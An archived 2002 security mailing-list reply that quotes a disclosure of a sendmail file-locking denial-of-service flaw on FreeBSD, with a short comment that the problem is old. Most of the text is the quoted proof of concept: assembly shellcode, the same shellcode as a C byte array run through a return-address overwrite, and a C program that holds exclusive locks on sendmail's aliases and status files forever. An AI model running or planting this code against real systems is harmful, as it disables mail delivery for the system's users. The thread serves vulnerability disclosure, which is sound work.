Re: Sendmail file locking - PoC

From: David R (sdrhodus@kyblue.com)
Date: 05/27/02 

Date: Sun, 26 May 2002 18:22:23 -0400
From: David R <sdrhodus@kyblue.com>
To: KF <dotslash@snosoft.com>

This is not really new. I can remeber many times vi'ing the aliases file
and walking away and sendmail start crying.
 
KF wrote:

> A problem has been identified in sendmail that can result in a denial
> of service attack. Attached is proof of concept code for this issue.
>
> http://www.sendmail.org/LockingAdvisory.txt
>
> have a safe Memorial Day folks.
>
> -KF
>
>
>------------------------------------------------------------------------
>
>;
>; Safemode.org, written by zillion 2002/05/24
>; http://www.snosoft.com : zillion@snosoft.com
>; http://www.sendmail.org/LockingAdvisory.txt
>;
>
>
>BITS 32
>
>jmp short callit
>
>doit:
>
>pop esi
>xor eax,eax
>mov [esi + 20],al
>push eax
>push esi
>mov al,5
>push eax
>int 0x80
>
>push byte 0x2
>push eax
>mov al,131
>push eax
>int 0x80
>
>; Where going to stay forever ;-)
>
>sub cl,0x3
>l00p:
>js l00p
>
>callit:
>call doit
>
>db '/etc/mail/aliases.db'
>
>
>------------------------------------------------------------------------
>
>/*
>
>FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
>Written by zillion (at http://www.safemode.org && http://www.snosoft.com)
>
>More info: http://www.sendmail.org/LockingAdvisory.txt
>
>*/
>
>char shellcode[] =
> "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
> "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
> "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
> "\x69\x61\x73\x65\x73\x2e\x64\x62";
>
>int main()
>{
>
> int *ret;
> ret = (int *)&ret + 2;
> (*ret) = (int)shellcode;
>}
>
>
>------------------------------------------------------------------------
>
>#include <fcntl.h>
>#include <unistd.h>
>
>/*
>
>Stupid piece of code to test the sendmail lock vulnerability on
>FreeBSD. Run this and try sendmail -t on FreeBSD for example.
>
>More info: http://www.sendmail.org/LockingAdvisory.txt
>
>zillion (at safemode.org && snosoft.com)
>http://www.safemode.org
>http://www.snosoft.com
>
>*/
>
>int main() {
>
> if(fork() == 0) {
>
> char *lock1 = "/etc/mail/aliases";
> char *lock2 = "/etc/mail/aliases.db";
> char *lock3 = "/var/log/sendmail.st";
>
> int fd;
> fd = open(lock1,O_RDONLY);
> flock(fd,0x02);
>
> fd = open(lock2,O_RDONLY);
> flock(fd,0x02);
>
> fd = open(lock3,O_RDONLY);
> flock(fd,0x02);
>
> /* We are here to stay! */
>
> for(;;) {}
>
> }
>}
>

Relevant Pages

  • [LSD] Technical analysis of the remote sendmail vulnerability
    ... We have done some brief analysis of the potential remote Sendmail vulnerability ... is encountered in the address string, the value of the buflim pointer (denoting ... the sendmail process in such a way thay program counter value can be fully controlled. ... int _flags field from the FILE object, was patched so that its 0x08 bit was ...
    (Bugtraq)
  • Sendmail file locking - PoC
    ... Attached is proof of concept code for this issue. ... FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db ... int main{ ...
    (Bugtraq)
  • Sendmail file locking - PoC
    ... Attached is proof of concept code for this issue. ... FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db ... int main{ ...
    (Vuln-Dev)
  • RE: Cannot su or have root access after changing loader.conf
    ... Installing FreeBSD on large disk>2TB ... How I use sendmail to send mail? ...
    (freebsd-questions)
  • [Full-Disclosure] FreeBSD Security Advisory FreeBSD-SA-03:13.sendmail
    ... FreeBSD includes sendmail, ... running sendmail, typically root. ... Disable sendmail by executing the following commands as root: ... The following patch has been verified to apply to FreeBSD 5.1, 4.8, ...
    (Full-Disclosure)